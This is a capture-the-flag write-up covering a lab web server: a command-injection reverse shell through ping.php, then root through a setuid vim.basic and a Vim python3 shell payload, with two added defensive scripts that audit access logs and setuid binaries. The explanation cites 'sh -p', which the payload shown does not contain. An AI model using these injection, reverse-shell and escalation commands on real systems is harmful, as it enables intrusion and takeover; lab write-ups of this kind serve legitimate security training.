PingCTF

Reconnaissance

┌──(zwique㉿zwique)-[~/Downloads]
└─$ nmap 172.17.0.2 -sV -A -p- 
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-08-05 19:57 +08
Nmap scan report for 172.17.0.2
Host is up (0.000043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Ping
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.04 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds

Well, there is only one open port. Let's check it out.

Once you access port 80, you'll see a simple IP address checker page. Try sending a request by clicking the blue button. Eventually, it redirects to ping.php?target=. So, I tried this command injection payload: 127.0.0.1; ls. It worked perfectly, listing files under the www-data user. Now, instead of the ls command, try injecting a reverse shell that connects back to your netcat listener.

www-data

Start netcat listener: nc -lnvp 4444

Inject the payload: 127.0.0.1; bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1' OR http://172.17.0.2/ping.php?target=127.0.0.1%3B+bash+-c+'bash+-i+>%26+%2Fdev%2Ftcp%2F172.17.0.1%2F4444+0>%261'
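
How this injection shows up on the defender's side, as an added example that is not part of the original write-up: a filter over Apache access-log lines that reports any ping.php request whose target is not a bare IP address or hostname. The function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag ping.php requests whose "target" is not a bare IP or hostname.
# Reads Apache access-log lines on stdin; prints "<client-ip> <raw target>" per hit.
flag_ping_injection() {
    awk '
    {
        # The request line is the first double-quoted field: METHOD URI PROTOCOL
        if (split($0, q, "\"") < 3) next
        split(q[2], req, " ")
        uri = req[2]
        if (uri !~ /\/ping\.php\?/) next
        sub(/^[^?]*\?/, "", uri)          # keep only the query string
        n = split(uri, kv, "&")
        for (i = 1; i <= n; i++) {
            if (kv[i] !~ /^target=/) continue
            val = substr(kv[i], 8)        # text after "target="
            # An IP or hostname never needs %-encoding, "+" or a leading "-",
            # so anything outside this allow-list is reported.
            if (val != "" && val !~ /^[A-Za-z0-9:][A-Za-z0-9.:-]*$/) print $1, val
        }
    }'
}

# Constructed sample log lines (not taken from the target host).
sample_log() {
    cat <<'EOF'
172.17.0.1 - - [05/Aug/2025:20:01:12 +0800] "GET /ping.php?target=127.0.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.17.0.1 - - [05/Aug/2025:20:01:40 +0800] "GET /ping.php?target=127.0.0.1%3B+ls HTTP/1.1" 200 731 "-" "Mozilla/5.0"
172.17.0.1 - - [05/Aug/2025:20:02:03 +0800] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF
}

sample_log | flag_ping_injection
```

The same allow-list, applied to the target parameter before it reaches any shell command, is what closes the hole in the handler itself.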

Root

The first thing I did was run the linpeas.sh script and look for suspicious things. Then I found one file called vim.basic which has root access.

You can find it by listing SUID files: find / -perm -u=s -type f 2>/dev/null

www-data@f2456883b1f4:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/vim.basic
www-data@f2456883b1f4:/var/www/html$ ls -l /usr/bin/vim.basic
ls -l /usr/bin/vim.basic
-rwsr-xr-x 1 root root 4126400 Apr  1 20:12 /usr/bin/vim.basic
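
A defender's version of the same check, as an added example that is not part of the original write-up: it compares the find output against a reviewed baseline so that an unexpected setuid binary such as vim.basic stands out. The baseline list and the function names are assumptions built from the listing above.

```shell
#!/bin/sh
# Added example: report setuid binaries that are not in a reviewed baseline.

# Assumed baseline: the setuid binaries from the listing above that a stock
# Ubuntu image is expected to ship. Review and adjust per image.
suid_baseline() {
    cat <<'EOF'
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
EOF
}

# Reads one path per line on stdin and prints every path not in the baseline.
suid_unexpected() {
    baseline=$(suid_baseline)
    while IFS= read -r path; do
        # -x whole-line match, -F fixed string: no partial or regex matches
        printf '%s\n' "$baseline" | grep -qxF -- "$path" || printf '%s\n' "$path"
    done
}

# Live audit using the same find expression as the write-up.
suid_audit_live() {
    find / -perm -u=s -type f 2>/dev/null | suid_unexpected
}

# Constructed sample: the find output shown above, replayed offline.
sample_find_output() {
    suid_baseline
    printf '%s\n' /usr/bin/vim.basic
}

# Each reported path is a finding; "chmod u-s <path>" clears the setuid bit.
sample_find_output | suid_unexpected
```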

I searched the internet for privilege escalation vulnerabilities in the Vim editor and found quite a good one here.

I tried the first payload, but it didn't work as expected because Vim intentionally drops root privileges at startup.

To get to know more about our vim.basic, I used the /usr/bin/vim.basic --help command to get information.

www-data@f2456883b1f4:/var/www/html$ /usr/bin/vim.basic --version
/usr/bin/vim.basic --version
VIM - Vi IMproved 9.1 (2024 Jan 02, compiled Apr 01 2025 20:12:31)
Included patches: 1-16, 647, 678, 697
Modified by team+vim@tracker.debian.org
Compiled by team+vim@tracker.debian.org
Huge version without GUI.  Features included (+) or not (-):
+acl               +file_in_path      +mouse_urxvt       -tag_any_white
+arabic            +find_in_path      +mouse_xterm       -tcl
+autocmd           +float             +multi_byte        +termguicolors
+autochdir         +folding           +multi_lang        +terminal
-autoservername    -footer            -mzscheme          +terminfo
-balloon_eval      +fork()            +netbeans_intg     +termresponse
+balloon_eval_term +gettext           +num64             +textobjects
-browse            -hangul_input      +packages          +textprop
++builtin_terms    +iconv             +path_extra        +timers
+byte_offset       +insert_expand     -perl              +title
+channel           +ipv6              +persistent_undo   -toolbar
+cindent           +job               +popupwin          +user_commands
-clientserver      +jumplist          +postscript        +vartabs
-clipboard         +keymap            +printer           +vertsplit
+cmdline_compl     +lambda            +profile           +vim9script
+cmdline_hist      +langmap           -python            +viminfo
+cmdline_info      +libcall           +python3           +virtualedit
+comments          +linebreak         +quickfix          +visual
+conceal           +lispindent        +reltime           +visualextra
+cryptv            +listcmds          +rightleft         +vreplace
+cscope            +localmap          -ruby              +wildignore
+cursorbind        -lua               +scrollbind        +wildmenu
+cursorshape       +menu              +signs             +windows
+dialog_con        +mksession         +smartindent       +writebackup
+diff              +modify_fname      +sodium            -X11
+digraphs          +mouse             -sound             +xattr
-dnd               -mouseshape        +spell             -xfontset
-ebcdic            +mouse_dec         +startuptime       -xim
+emacs_tags        +mouse_gpm         +statusline        -xpm
+eval              -mouse_jsbterm     -sun_workshop      -xsmp
+ex_extra          +mouse_netterm     +syntax            -xterm_clipboard
+extra_search      +mouse_sgr         +tag_binary        -xterm_save
-farsi             -mouse_sysmouse    -tag_old_static    
   system vimrc file: "/etc/vim/vimrc"
     user vimrc file: "$HOME/.vimrc"
 2nd user vimrc file: "~/.vim/vimrc"
      user exrc file: "$HOME/.exrc"
       defaults file: "$VIMRUNTIME/defaults.vim"
  fall-back for $VIM: "/usr/share/vim"
Compilation: gcc -c -I. -Iproto -DHAVE_CONFIG_H -Wdate-time -g -O2 -fno-omit-frame-pointer -mno-omit-leaf-frame-pointer -ffile-prefix-map=/build/vim-AkQQan/vim-9.1.0016=. -flto=auto -ffat-lto-objects -fstack-protector-strong -fstack-clash-protection -Wformat -Werror=format-security -fcf-protection -fdebug-prefix-map=/build/vim-AkQQan/vim-9.1.0016=/usr/src/vim-2:9.1.0016-1ubuntu7.8 -DSYS_VIMRC_FILE=\"/etc/vim/vimrc\" -DSYS_GVIMRC_FILE=\"/etc/vim/gvimrc\" -D_REENTRANT -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1 
Linking: gcc -Wl,-Bsymbolic-functions -flto=auto -ffat-lto-objects -Wl,-z,relro -Wl,-z,now -Wl,--as-needed -o vim -lm -ltinfo -lselinux -lsodium -lacl -lattr -lgpm -L/usr/lib/python3.12/config-3.12-x86_64-linux-gnu -lpython3.12 -ldl -lm

Perfect, it's compiled with +python3. That means I can escalate to root using Python inside Vim by spawning a root shell via SUID privileges. Use the third (c) payload from GTFOBins.

1. /usr/bin/vim.basic
2. vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

What this does:

Runs Python3 inside Vim

Calls os.execl() to launch a new shell

sh -p preserves the SUID root privileges

You now have a real root shell! 🎉 This is how I got so far.
